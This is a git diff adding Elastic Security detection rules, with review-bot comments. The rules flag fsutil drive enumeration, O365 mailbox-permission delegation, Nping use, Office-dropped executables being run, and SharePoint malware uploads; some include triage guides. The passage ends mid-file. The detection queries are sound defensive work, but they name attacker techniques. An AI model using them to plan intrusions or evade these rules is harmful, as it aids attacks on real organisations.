@@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of the Windows file system utility (fsutil.exe) to gather information about attached peripheral devices and components connected to a computer system.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Peripheral Device Discovery", + "note": "## Triage and analysis\n\n### Investigating Peripheral Device Discovery\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the execution of the `fsutil` utility with the `fsinfo` subcommand to enumerate drives attached to the computer, which can be used to identify secondary drives used for backups, mapped network drives, and removable media. These devices can contain valuable information for attackers.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Determine whether this activity was followed by suspicious file access/copy operations or uploads to file storage services.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. 
As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"fsutil.exe\" or ?process.pe.original_file_name == \"fsutil.exe\") and\n process.args : \"fsinfo\" and process.args : \"drives\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default 
fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1120", + "name": "Peripheral Device Discovery", + "reference": "https://attack.mitre.org/techniques/T1120/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0ce6487d-8069-4888-9ddd-61b52490cebc_103.json b/packages/security_detection_engine/kibana/security_rule/0ce6487d-8069-4888-9ddd-61b52490cebc_103.json new file mode 100644 index 00000000000..58735bf3432 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0ce6487d-8069-4888-9ddd-61b52490cebc_103.json 
@@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies the assignment of rights to access content from another mailbox. An adversary may use the compromised account to send messages to other accounts in the network of the target organization while creating inbox rules, so messages can evade spam/phishing detection mechanisms.", + "false_positives": [ + "Assignment of rights to a service account." + ], + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "O365 Exchange Suspicious Mailbox Right Delegation", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.action:Add-MailboxPermission and\no365.audit.Parameters.AccessRights:(FullAccess or SendAs or SendOnBehalf) and event.outcome:success and\nnot user.id : \"NT AUTHORITY\\SYSTEM (Microsoft.Exchange.Servicehost)\"\n", + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.AccessRights", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "0ce6487d-8069-4888-9ddd-61b52490cebc", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "low", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": 
"https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/", + "subtechnique": [ + { + "id": "T1098.002", + "name": "Additional Email Delegate Permissions", + "reference": "https://attack.mitre.org/techniques/T1098/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "0ce6487d-8069-4888-9ddd-61b52490cebc_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0ce6487d-8069-4888-9ddd-61b52490cebc_105.json b/packages/security_detection_engine/kibana/security_rule/0ce6487d-8069-4888-9ddd-61b52490cebc_105.json new file mode 100644 index 00000000000..6e3da2a545f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0ce6487d-8069-4888-9ddd-61b52490cebc_105.json 
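Review bot: `note` is an empty string in `0ce6487d-8069-4888-9ddd-61b52490cebc_103.json`, so the rule ships with no triage guide while the other rules in this commit carry a `## Triage and analysis` section; the identical `_105` and `_206` copies in the next two hunks have the same gap. A short guide covering who issued `Add-MailboxPermission`, which mailbox and `AccessRights` value were granted, and whether the grant is change-managed would let an analyst act on a `Tactic: Persistence` alert without reconstructing that from the raw `o365.audit` event. The `setup` string is also the only one in this chunk written without the `## Setup` heading the other rules use.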
@@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies the assignment of rights to access content from another mailbox. An adversary may use the compromised account to send messages to other accounts in the network of the target organization while creating inbox rules, so messages can evade spam/phishing detection mechanisms.", + "false_positives": [ + "Assignment of rights to a service account." + ], + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "O365 Exchange Suspicious Mailbox Right Delegation", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.action:Add-MailboxPermission and\no365.audit.Parameters.AccessRights:(FullAccess or SendAs or SendOnBehalf) and event.outcome:success and\nnot user.id : \"NT AUTHORITY\\SYSTEM (Microsoft.Exchange.Servicehost)\"\n", + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.AccessRights", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "0ce6487d-8069-4888-9ddd-61b52490cebc", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "low", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": 
"https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/", + "subtechnique": [ + { + "id": "T1098.002", + "name": "Additional Email Delegate Permissions", + "reference": "https://attack.mitre.org/techniques/T1098/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "0ce6487d-8069-4888-9ddd-61b52490cebc_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0ce6487d-8069-4888-9ddd-61b52490cebc_206.json b/packages/security_detection_engine/kibana/security_rule/0ce6487d-8069-4888-9ddd-61b52490cebc_206.json new file mode 100644 index 00000000000..711aa1224ae --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0ce6487d-8069-4888-9ddd-61b52490cebc_206.json 
@@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies the assignment of rights to access content from another mailbox. An adversary may use the compromised account to send messages to other accounts in the network of the target organization while creating inbox rules, so messages can evade spam/phishing detection mechanisms.", + "false_positives": [ + "Assignment of rights to a service account." + ], + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "O365 Exchange Suspicious Mailbox Right Delegation", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.action:Add-MailboxPermission and\no365.audit.Parameters.AccessRights:(FullAccess or SendAs or SendOnBehalf) and event.outcome:success and\nnot user.id : \"NT AUTHORITY\\SYSTEM (Microsoft.Exchange.Servicehost)\"\n", + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.AccessRights", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "0ce6487d-8069-4888-9ddd-61b52490cebc", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "low", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": 
"https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/", + "subtechnique": [ + { + "id": "T1098.002", + "name": "Additional Email Delegate Permissions", + "reference": "https://attack.mitre.org/techniques/T1098/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "0ce6487d-8069-4888-9ddd-61b52490cebc_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_108.json b/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_108.json new file mode 100644 index 00000000000..e74e23be3ba --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_108.json 
@@ -0,0 +1,92 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Nping ran on a Linux host. Nping is part of the Nmap tool suite and has the ability to construct raw packets for a wide variety of security testing applications, including denial of service testing.", + "false_positives": [ + "Some normal use of this command may originate from security engineers and network or server administrators, but this is usually not routine or unannounced. Use of `Nping` by non-engineers or ordinary users is uncommon." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Nping Process Activity", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and process.name == \"nping\"\n", + "references": [ + "https://en.wikipedia.org/wiki/Nmap" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "0d69150b-96f8-467c-a86d-a67a3378ce77", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1046", + "name": "Network Service Discovery", + "reference": "https://attack.mitre.org/techniques/T1046/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "0d69150b-96f8-467c-a86d-a67a3378ce77_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_109.json b/packages/security_detection_engine/kibana/security_rule/0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_109.json new file mode 100644 index 00000000000..67b4c7dc34f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_109.json 
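Review bot: The `setup` text opens with "This rule requires data coming in from one of the following integrations: Elastic Defend, Auditbeat", but `index` also covers `endgame-*` and `logs-auditd_manager.auditd-*`, and `related_integrations` declares `auditd_manager`; a user onboarding through Auditd Manager or Endgame gets no setup guidance from this rule. Suggest adding an `### Auditd Manager Setup` subsection, or at least extending the integration list so it agrees with `index` and `related_integrations`.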
@@ -0,0 +1,126 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an executable created by a Microsoft Office application and subsequently executed. These processes are often launched via scripts inside documents or during exploitation of Microsoft Office applications.", + "from": "now-120m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Execution of File Written or Modified by Microsoft Office", + "note": "## Triage and analysis\n\n### Investigating Execution of File Written or Modified by Microsoft Office\n\nMicrosoft Office, a widely used suite of productivity applications, is frequently targeted by attackers due to its popularity in corporate environments. Attackers exploit its extensive capabilities, like macro scripts in Word and Excel, to gain initial access to systems. They often use Office documents as delivery mechanisms for malware or phishing attempts, taking advantage of their trusted status in professional settings.\n\nThis rule searches for executable files written by MS Office applications executed in sequence. This is most likely the result of the execution of malicious documents or exploitation for initial access or privilege escalation. This rule can also detect suspicious processes masquerading as the MS Office applications.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve MS Office documents received and opened by the user that could cause this behavior. 
Common locations include, but are not limited to, the Downloads and Document folders and the folder configured at the email client.\n- Determine if the collected files are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence with maxspan=2h\n [file where host.os.type == \"windows\" and event.type != \"deletion\" and file.extension : \"exe\" and\n (process.name : \"WINWORD.EXE\" or\n process.name : \"EXCEL.EXE\" or\n process.name : \"OUTLOOK.EXE\" or\n process.name : \"POWERPNT.EXE\" or\n process.name : \"eqnedt32.exe\" or\n process.name : \"fltldr.exe\" or\n process.name : \"MSPUB.EXE\" or\n process.name : \"MSACCESS.EXE\")\n ] by host.id, file.path\n [process where host.os.type == \"windows\" and event.type == \"start\" and \n not (process.name : \"NewOutlookInstaller.exe\" and process.code_signature.subject_name : \"Microsoft Corporation\" and process.code_signature.trusted == true)\n ] by host.id, process.executable\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, 
+ { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + }, + { + "id": "T1566.002", + "name": "Spearphishing Link", + "reference": "https://attack.mitre.org/techniques/T1566/002/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 109 + }, + "id": "0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_103.json b/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_103.json new file mode 100644 index 00000000000..4413414c00e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_103.json 
@@ -0,0 +1,83 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the occurence of files uploaded to SharePoint being detected as Malware by the file scanning engine. Attackers can use File Sharing and Organization Repositories to spread laterally within the company and amplify their access. Users can inadvertently share these files without knowing their maliciousness, giving adversaries opportunities to gain initial access to other endpoints in the environment.", + "false_positives": [ + "Benign files can trigger signatures in the built-in virus protection" + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "SharePoint Malware File Upload", + "note": "", + "query": "event.dataset:o365.audit and event.provider:SharePoint and event.code:SharePointFileOperation and event.action:FileMalwareDetected\n", + "references": [ + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/virus-detection-in-spo?view=o365-worldwide" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "0e52157a-8e96-4a95-a6e3-5faae5081a74", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Tactic: Lateral Movement" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ 
+ { + "id": "T1080", + "name": "Taint Shared Content", + "reference": "https://attack.mitre.org/techniques/T1080/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "0e52157a-8e96-4a95-a6e3-5faae5081a74_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_105.json b/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_105.json new file mode 100644 index 00000000000..0868b843b99 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_105.json 
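Review bot: The `description` misspells "occurence" ("Identifies the occurence of files uploaded to SharePoint ..."); the same text appears in the `_105` and `_206` snapshots of this rule in the following two hunks. If these files are frozen copies of already-published rule versions, the fix belongs in the next version of the rule rather than in these snapshots; otherwise the one-word change is `Identifies the occurrence of files uploaded to SharePoint`.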
@@ -0,0 +1,83 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the occurence of files uploaded to SharePoint being detected as Malware by the file scanning engine. Attackers can use File Sharing and Organization Repositories to spread laterally within the company and amplify their access. Users can inadvertently share these files without knowing their maliciousness, giving adversaries opportunities to gain initial access to other endpoints in the environment.", + "false_positives": [ + "Benign files can trigger signatures in the built-in virus protection" + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "SharePoint Malware File Upload", + "note": "", + "query": "event.dataset:o365.audit and event.provider:SharePoint and event.code:SharePointFileOperation and event.action:FileMalwareDetected\n", + "references": [ + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/virus-detection-in-spo?view=o365-worldwide" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "0e52157a-8e96-4a95-a6e3-5faae5081a74", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Tactic: Lateral Movement" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ 
+ { + "id": "T1080", + "name": "Taint Shared Content", + "reference": "https://attack.mitre.org/techniques/T1080/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "0e52157a-8e96-4a95-a6e3-5faae5081a74_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_206.json b/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_206.json new file mode 100644 index 00000000000..0fcb4882fad --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_206.json 
@@ -0,0 +1,83 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the occurence of files uploaded to SharePoint being detected as Malware by the file scanning engine. Attackers can use File Sharing and Organization Repositories to spread laterally within the company and amplify their access. Users can inadvertently share these files without knowing their maliciousness, giving adversaries opportunities to gain initial access to other endpoints in the environment.", + "false_positives": [ + "Benign files can trigger signatures in the built-in virus protection" + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "SharePoint Malware File Upload", + "note": "", + "query": "event.dataset:o365.audit and event.provider:SharePoint and event.code:SharePointFileOperation and event.action:FileMalwareDetected\n", + "references": [ + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/virus-detection-in-spo?view=o365-worldwide" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "0e52157a-8e96-4a95-a6e3-5faae5081a74", + "setup": "The Office 365 Logs Fleet integration, Filebeat 